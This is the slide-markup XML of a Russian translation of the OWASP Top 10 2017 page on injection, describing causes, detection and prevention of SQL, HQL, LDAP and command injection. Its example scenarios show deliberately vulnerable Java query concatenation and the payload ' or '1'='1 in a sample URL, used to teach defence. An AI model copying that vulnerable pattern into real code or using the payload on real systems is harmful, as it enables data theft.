                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SQL-вызова:</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String</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query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = "SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:b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custID</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request.getParameter</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err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id</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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Сценарий №2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Безоговорочное доверие приложений к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>фреймворкам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> может привести к появлению уязвимых запросов (например, в языке запросов HQL):</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Query</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HQLQuery</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session.createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custID</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request.getParameter</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err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id</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 обоих случаях злоумышленник изменяет в своем браузере значение параметра "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" для отправки </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or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Например: </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http://example.com/app/accountView?id=</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or</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1</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Изменение обоих запросов позволяет получить все записи из таблицы учетных данных. Более серьезные атаки позволяют изменить или удалить данные, а также вызвать хранимые процедуры.</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9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вводимые пользователем данные не проверяются, не фильтруются или не очищаются;</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динамические запросы или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>непараметризованные</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> вызовы без контекстного экранирования напрямую используются в интерпретаторе;</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вредоносные данные используются в поисковых параметрах объектно-реляционного отображения для извлечения дополнительной, критичной информации;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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вредоносные данные используются или добавляются </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>т.о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>., что </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  SQL-код </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>или команды содержат структурные и вредоносные данные в динамических запросах, командах или хранимых процедурах.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1270" indent="-1270">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Наиболее распространенными являются SQL-, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-, ORM-, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  LDAP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, EL- или OGNL-внедрения, а также внедрения команд ОС. То же самое касается всех интерпретаторов. Анализ исходного кода является лучшим способом обнаружения внедрений, за которым следует полное автоматизированное тестирование всех вводимых параметров, заголовков, URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, JSON-, SOAP- и XML-данных. Организации также могут включать в процесс непрерывной интеграции и развертывания ПО (CI/CD) статическое (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) и динамическое (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="790" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) тестирование кода и приложений для обнаружения новых уязвимостей перед внедрением приложений в производство.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000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ссылки OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="10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6"/>
              </a:rPr>
              <a:t>Проактивная</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> защита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 V5 Проверка входных данных и кодировки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Внедрение SQL-кода</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9"/>
              </a:rPr>
              <a:t>команд</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10"/>
              </a:rPr>
              <a:t>ORM</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Памятка OWASP: Предотвращение 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Памятка OWASP: Предотвращение SQL-внедрений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3"/>
              </a:rPr>
              <a:t>Памятка OWASP: Предотвращение внедрений в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="8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4"/>
              </a:rPr>
              <a:t>Памятка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5"/>
              </a:rPr>
              <a:t>Справочник OWASP по автоматизированным атакам на веб-приложения – OAT-014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="10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6"/>
              </a:rPr>
              <a:t>CWE-77: Внедрение команд</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7"/>
              </a:rPr>
              <a:t>CWE-89: Внедрение SQL</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8"/>
              </a:rPr>
              <a:t>CWE-564: Внедрение SQL-кода с использованием </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId18"/>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9"/>
              </a:rPr>
              <a:t>CWE-917: Внедрение кода языка выражений</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20"/>
              </a:rPr>
              <a:t>PortS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>wigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>: Внедрение в серверные шаблоны</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Для предотвращения внедрений необходимо изолировать данные от команд и запросов.</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Используйте безопасный API, исключающий применение интерпретатора или предоставляющий параметризованный интерфейс, либо используйте инструменты объектно-реляционного отображения (ORM).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Примечание</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: даже параметризованные хранимые процедуры могут привести к SQL-внедрениям, если PL/SQL или T-SQL позволяют присоединять запросы и данные или выполнять вредоносный код с помощью EXECUTE IMMEDIATE или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>().</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Реализуйте на сервере белые списки для проверки входных данных. Это, конечно, не обеспечит полную защиту, поскольку многие приложения используют спецсимволы, например, в текстовых областях или API для мобильных приложений.</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Для остальных динамических запросов реализуйте экранирование спецсимволов, используя соответствующий интерпретатору синтаксис.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Примечание</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: элементы SQL-структуры, такие как названия таблиц или столбцов, нельзя экранировать, поэтому предоставляемые пользователями названия представляют опасность. Это обычная проблема программ для составления отчетов.</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Используйте в запросах LIMIT или другие элементы управления SQL для предотвращения утечек данных.</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a:t>A1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Внедрение</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1205637322"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836272"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эксплуатации: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" i="0" u="none" strike="noStrike"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обнаружения: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" i="0" u="none" strike="noStrike"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80" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Почти любой источник данных может оказаться вектором для внедрения: переменные окружения, параметры, внешние и внутренние веб-службы, а также все типы пользователей. </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hlinkClick r:id="rId22"/>
                        </a:rPr>
                        <a:t>Внедрения</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rPr>
                        <a:t> становятся возможными, если злоумышленник может отправлять интерпретатору вредоносные данные.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800" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Внедрения особенно распространены в старом коде. Уязвимости часто встречаются в SQL- LDAP-, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XPath</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- или </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NoSQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-запросах, системных командах, XML-обработчиках, SMTP-заголовках, языках выражений и ORM-запросах. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Внедрения легко обнаружить при анализе кода. Сканеры и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>фаззеры</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" dirty="0">
